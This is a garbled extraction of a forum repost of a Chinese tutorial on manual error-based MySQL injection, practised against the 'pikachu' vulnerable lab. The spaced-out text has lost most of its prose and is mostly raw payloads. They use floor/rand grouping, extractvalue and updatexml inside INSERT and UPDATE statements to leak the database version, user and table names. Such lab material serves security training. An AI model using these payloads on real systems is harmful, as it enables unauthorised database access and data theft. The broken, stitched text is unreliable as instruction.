[20339] 2020-06-26_Mysql报错型手工注入

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2020-06-26_Mysql报错型手工注入 M y s q l K h a n   2 0 2 0 - 0 6 - 2 6 P t T e a m   H o l y m a n 使 使 f l o o r ( ) e x t r a c t v a l u e ( ) u p d a t e x m l ( ) 0 1 I n s e r t N o . 1 : f l o o r N o . 2 : e x t r a c t v a l u e N o . 3 : u p d a t e x m l s t a r t p h p N o . 1 便         1 . p a y l o a d         2 . t e s t         3 . N U L L s u c c e d ! p i k a c h u p a y l o a d P t T e a m   . P t - T e a m w e b '   a n d   ( s e l e c t     c o u n t ( * )     f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y   c o n c a t ( ( s e l e c t   v e r s i o n ( ) ) , f l o o r ( r a n d ( 0 ) * 2 ) ) ) # '   a n d   e x t r a c t v a l u e ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   u s e r ( ) ) , 0 x 7 e ) ) # '   a n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   u s e r ( ) ) ) , 0 x 7 e ) # i n s e r t   i n t o   m e m b e r ( u s e r n a m e , p w , s e x , p h o n e n u m , e m a i l , a d d r e s s )   v a l u e s ( ' { $ g e t d a t a [ ' u s e r n a m e ' ] } ' , m d 5 ( ' { $ g e t d a t a [ ' p a s s w o r d ' ] } ' ) , ' { $ g e t d a t a [ ' s e x ' ] } ' , ' { $ g e t d a t a [ ' p h o n e n u m ' ] } ' , ' { $ g e t d a t a [ ' e m a i l ' ] } ' , ' { $ g e t d a t a [ ' a d d ' ] } ' ) '   o r   ( s e l e c t   c o u n t ( * )     f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y   c o n c a t ( ( s e l e c t   v e r s i o n ( ) ) , f l o o r ( r a n d ( 0 ) * 2 ) ) )   o r   ' i n s e r t   i n t o   m e m b e r ( u s e r n a m e , p w , s e x , p h o n e n u m , e m a i l , a d d r e s s )   v a l u e s ( ' { $ g e t d a t a [ ' '   o r   ( s e l e c t     c o u n t ( * )     f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y   c o n c a t ( ( s e l e c t   v e r s i o n ( ) ) , f l o o r ( r a n d ( 0 ) * 2 ) ) )   o r   ' ' ] } ' , m d 5 ( ' { $ g e t d a t a [ ' t e s t ' ] } ' ) , ' { $ g e t d a t a [ ' ' ] } ' , ' { $ g e t d a t a [ ' ' ] } ' , ' { $ g e t d a t a [ ' ' ] } ' , ' { $ g e t d a t a [ ' a d d ' ] } ' ) '   o r   ( s e l e c t   c o u n t ( * )     f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   g r o u p   b y   c o n c a t ( ( s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = ' p i k a c h u '   l i m i t   0 , 1 ) , f l o o r ( r a n d ( 0 ) * 2 ) ) )   o r   '
N o . 2 s u s s e d ! N o . 3 s u s s e d ! 0 2 u p d a t e P H P '   o r   e x t r a c t v a l u e ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   u s e r ( ) ) , 0 x 7 e ) )   o r   ' '   o r   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   u s e r ( ) ) ) , 0 x 7 e )   o r   '
        1 .         2 . N o . 3 p a y l o a d p a y l o a d # s u s s e d ! 0 1 i n s e r t u p d a t e i n s e r t u p d a t e i n s e r t o r a n d M y s q l u p d a t e P H P a n d E n d '   a n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   u s e r ( ) ) ) , 0 x 7 e ) # u p d a t e   m e m b e r   s e t   s e x = ' { $ g e t d a t a [ ' '   a n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   u s e r ( ) ) ) , 0 x 7 e ) # ' ] } ' , p h o n e n u m = ' { $ g e t d a t a [ ' 1 ' ] } ' , a d d r e s s = ' { $ g e t d a t a [ ' 1 ' ] } ' , e m a i l = ' { $ g e t d a t a [ ' 1 ' ] } '   w h e r e   u s e r n a m e = ' { $ _ S E S S I O N [ u p d a t e   m e m b e r   s e t   s e x = ' { $ g e t d a t a [ ' '   a n d   u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   u s e r ( ) ) ) , 0 x 7 e ) #
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则